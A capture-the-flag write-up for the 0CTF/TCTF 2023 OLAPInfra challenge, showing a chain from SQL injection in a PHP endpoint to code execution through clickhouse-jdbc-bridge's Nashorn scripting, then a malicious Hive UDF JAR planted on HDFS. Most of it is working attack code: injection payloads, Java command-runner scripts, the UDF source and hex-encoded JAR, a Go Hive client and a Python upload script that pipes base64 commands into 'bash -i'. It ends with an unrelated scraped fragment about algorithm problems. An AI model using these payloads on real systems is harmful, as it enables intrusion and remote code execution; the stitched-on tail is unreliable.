
0CTF/TCTF 2023 OLAPInfra Nashorn RCE + HDFS UDF RCE


Prerequisites

ClickHouse: an open-source column-oriented database management system.

clickhouse-jdbc-bridge: a bridge that lets ClickHouse query external data sources over JDBC.

HDFS (Hadoop Distributed File System): a distributed file system designed for big-data storage and processing.

Code Audit

<?php
error_reporting(E_ALL ^ E_DEPRECATED);
require __DIR__ . '/../vendor/autoload.php';
if (!isset($_GET['query'])) {
  show_source(__FILE__);
  exit;
}
$config = [
  'host' => 'clickhouse',
  'port' => '8123',
  'username' => 'default',
  'password' => ''
];
$db = new ClickHouseDB\Client($config);
$db->database('default');
$db->setTimeout(1.5);
$db->setTimeout(10);
$db->setConnectTimeOut(5);
$db->ping(true);
$statement = $db->select('SELECT * FROM u_data WHERE ' . $_GET['query'] . ' LIMIT 10');
echo (json_encode($statement->rows()));

// Err 'Uncaught ClickHouseDB\Exception\DatabaseException: connect to hive metastore: thrift' or
// Err 'NoSuchObjectException(message=hive.default.u_data table not found)',
// please wait for >= 1min, hive is not initialized.

This is a PHP endpoint that runs database queries. It leaks the ClickHouse connection settings, and the $db->select() call concatenates $_GET['query'] straight into the statement, giving us SQL injection: for example, ?query=userid=1 produces SELECT * FROM u_data WHERE userid=1 LIMIT 10.

From the official documentation, https://github.com/ClickHouse/clickhouse-jdbc-bridge/blob/v2.1.0/README.md#usage :

clickhouse-jdbc-bridge's jdbc() table function can execute ad-hoc SQL, saved queries, script files, and inline JavaScript:

-- adhoc query
select * from jdbc('ch-server', 'system', 'select * from query_log where user != ''default''')
select * from jdbc('ch-server', 'select * from query_log where user != ''default''')
select * from jdbc('ch-server', 'select * from system.query_log where user != ''default''')

-- table query
select * from jdbc('ch-server', 'system', 'query_log')
select * from jdbc('ch-server', 'query_log')

-- saved query
select * from jdbc('ch-server', 'scripts/show-query-logs.sql')

-- named query
select * from jdbc('ch-server', 'show-query-logs')

-- scripting
select * from jdbc('script', '[1,2,3]')
select * from jdbc('script', 'js', '[1,2,3]')
select * from jdbc('script', 'scripts/one-two-three.js')

The scripting support is backed by Nashorn, the JavaScript engine bundled with Java since version 8. Nashorn lets Java applications evaluate scripts written in JavaScript syntax, and those scripts get full access to JDK classes.

So we can call Java's Runtime class from an injected script to execute system commands.
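To see why the 'script' endpoint amounts to code execution, here is a minimal standalone sketch of what the bridge effectively does (class name NashornDemo is illustrative; runs on JDK 8-14, where Nashorn ships with the JDK):

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

public class NashornDemo {
    public static void main(String[] args) throws Exception {
        // clickhouse-jdbc-bridge hands the user-controlled string to the
        // JDK script engine; Nashorn exposes java.* packages to the script.
        ScriptEngine engine = new ScriptEngineManager().getEngineByName("nashorn");
        Object result = engine.eval("java.lang.Runtime.getRuntime().exec('id')");
        System.out.println(result); // a live java.lang.Process instance
    }
}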

Craft the SQL injection for RCE (the injected SELECT returns results plus three empty strings, matching u_data's four columns):

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script:', 'java.lang.Runtime.getRuntime().exec("ls")')

To get the command output echoed back, build the JavaScript step by step:

// create a ProcessBuilder to run the target binary
var a = new java.lang.ProcessBuilder("/readflag");

// start the process
b = a.start();

// grab its standard output stream
c = b.getInputStream();

// a StringBuilder to collect the output
sb = new java.lang.StringBuilder();

// read the stream byte by byte and append to sb
d = 0;
while ((d = c.read()) != -1) {
    sb.append(String.fromCharCode(d));
}

// close the stream, releasing the resource
c.close();

// the script's last expression is the value returned to jdbc()
sb.toString();

Then flatten it into a single injected statement:

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/readflag"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

That returns the first part of the flag.

The second part of the flag lives on the Hive machine. Per the Hive DDL documentation, https://cwiki.apache.org/confluence/display/Hive/LanguageManual+DDL#LanguageManualDDL-CreateFunction :


CREATE FUNCTION [db_name.]function_name AS class_name
  [USING JAR|FILE|ARCHIVE 'file_uri' [, JAR|FILE|ARCHIVE 'file_uri'] ];

a user-defined function can be registered from a JAR referenced by a file URI, e.g. a JAR uploaded to HDFS.

So we write a UDF that executes arbitrary commands and package it as a JAR:

package udf;

import org.apache.hadoop.hive.ql.exec.UDF;
import org.apache.hadoop.io.Text;
import java.io.*;

public final class Exec extends UDF {
  // Hive calls evaluate() once per row; the argument is the command to run.
  public Text evaluate(final Text s) {
    if (s == null) { return null; }
    try {
      String result = "";
      String command = s.toString();
      Process p = Runtime.getRuntime().exec(command);
      // collect the command's stdout line by line
      BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
      String inputLine;
      while ((inputLine = in.readLine()) != null) {
        result += inputLine + "\n";
      }
      in.close();
      return new Text(result);
    } catch (IOException e) {
      return new Text(e.toString());
    }
  }
}
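Before packaging, the UDF can be smoke-tested locally. A minimal sketch, assuming hive-exec and hadoop-common are on the classpath (ExecTest is a hypothetical harness, not part of the exploit):

import org.apache.hadoop.io.Text;
import udf.Exec;

public class ExecTest {
    public static void main(String[] args) {
        // call evaluate() the way Hive would for a single row
        Exec exec = new Exec();
        System.out.println(exec.evaluate(new Text("id")));
    }
}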

Hex-encode the finished JAR so it can be embedded in a SQL payload:

504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000
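A dump like the one above can be produced with a few lines of Java (a sketch; udf.jar stands in for whatever name the build step produced):

import java.nio.file.Files;
import java.nio.file.Paths;

public class HexDump {
    public static void main(String[] args) throws Exception {
        byte[] jar = Files.readAllBytes(Paths.get("udf.jar"));
        StringBuilder hex = new StringBuilder(jar.length * 2);
        for (byte b : jar) {
            // %02X prints each byte as two uppercase hex digits,
            // matching the blob above
            hex.append(String.format("%02X", b));
        }
        System.out.println(hex);
    }
}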

ClickHouse can write to HDFS through its HDFS table engine. By pointing jdbc() back at ClickHouse itself (127.0.0.1:8123), we execute SQL that creates a table backed by a.jar in the HDFS root:

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('jdbc:clickhouse://127.0.0.1:8123', 'CREATE TABLE hdfs_test (name String) ENGINE=HDFS(\'hdfs://namenode:8020/a.jar\', \'Native\');')

Then insert the JAR bytes; the engine writes them out to hdfs:///a.jar:

jdbc('jdbc:clickhouse://127.0.0.1:8123', 'INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insert=TRUE VALUES (unhex(\'504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000\')
)')

However, ClickHouse cannot speak Hive's Thrift protocol, so, following the challenge author's approach, we build a minimal Hive client in Go, compress it with UPX, then upload it in chunks and reassemble it on the ClickHouse host:

package main
 
import (
	"context"
	"github.com/beltran/gohive"
	"log"
	"os"
)
 
func main() {
	conf := gohive.NewConnectConfiguration()
	conf.Username = "root" // username maybe empty
	connection, errConn := gohive.Connect("hive", 10000, "NONE", conf)
	if errConn != nil {
		log.Fatalln(errConn)
	}
	defer connection.Close()
	cursor := connection.Cursor()
	ctx := context.Background()
	cursor.Exec(ctx, os.Args[1])
	if cursor.Err != nil {
		log.Fatalln(cursor.Err)
	}
	defer cursor.Close()
	var s string
	for cursor.HasMore(ctx) {
		cursor.FetchOne(ctx, &s)
		if cursor.Err != nil {
			log.Fatalln(cursor.Err)
		}
		log.Println(s)
	}
}
 
#!/bin/bash
# build in golang:1.21.3-bullseye
go build -a -gcflags=all="-l -B -wb=false" -ldflags "-s -w"
upx --brute --best clickhouse-to-hive
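The resulting binary takes a single HiveQL statement as its only argument (os.Args[1] above), so once it lands on the target it can be driven like, e.g., /tmp/ch-to-hive "show tables".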
 

A Python script handles the chunked upload:

import base64
import json
import requests

def query(s):
  a = requests.get('https://ip:port', params={
    "query": "1=0 union all select results, '2', '3', '4' from " + s
  })
  text = a.text
  try:
    return json.loads(text)[0]['userid']
  except:
    return a.text

def rce_in_clickhouse(c):
  sql = "jdbc('script:', 'var a=new java.lang.ProcessBuilder(\"bash\",\"-c\",\"{{echo,{}}}|{{base64,-d}}|{{bash,-i}}\"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){{sb.append(String.fromCharCode(d))}};c.close();sb.toString()')".format(base64.b64encode(c.encode('utf-8')).decode('utf-8'))
  return query(sql)

def upload():
  ch_to_hive = open('./clickhouse-to-hive/clickhouse-to-hive', 'rb').read()
  ch_to_hive_parts = [ch_to_hive[i:i+4096] for i in range(0, len(ch_to_hive), 4096)]
  for i, r in enumerate(ch_to_hive_parts):
    # Cannot append directly because the script will be executed twice
    s = base64.b64encode(r).decode('ascii')
    sql3 = "jdbc('script:', 'var fos=Java.type(\"java.io.FileOutputStream\");var f=new fos(\"/tmp/ttt{}\");f.write(java.util.Base64.decoder.decode(\"{}\"));f.close();1')".format(str(i), s)
    query(sql3)
  sql4 = "jdbc('script:', 'var File=Java.type(\"java.io.File\");var fos=Java.type(\"java.io.FileOutputStream\");var fis=Java.type(\"java.io.FileInputStream\");var f=new fos(\"/tmp/ch-to-hive\");for(var i=0;i<{};i++){{var ff=new File(\"/tmp/ttt\"+i.toString());var a=new Array(ff.length()+1).join(\"1\").getBytes();var fi=new fis(ff);fi.read(a);fi.close();f.write(a);}}f.close();')".format(str(len(ch_to_hive_parts)))
  query(sql4)
  # make the reassembled client executable and remove the chunks
  rce_in_clickhouse('chmod +x /tmp/ch-to-hive && rm -rf /tmp/ttt*')

upload()

Finally, drive the uploaded Hive client to register the UDF from the JAR on HDFS:

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/tmp/ch-to-hive","create function default.v as \'udf.Exec\' using jar \'hdfs:///a.jar\'"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

Then read /readflag through the new function:

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/tmp/ch-to-hive","SELECT default.v(\'/readflag\')"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

Finally, clean up after ourselves and delete the uploaded client:

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("rm","-rf","/tmp/ch-to-hive"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

From: https://blog.csdn.net/m0_68483928/article/details/140826098

    这里写目录标题A思维题【AC】B贪心(+双指针)【补题】冗余代码(我的):大佬:双指针代码借鉴后代码C异或问题【补题】A思维题【AC】思路:每次分成k-1个1,1个其他#include<iostream>#include<cstring>#include<algorithm>usingnamespacestd;//constintN=2e5+10;v......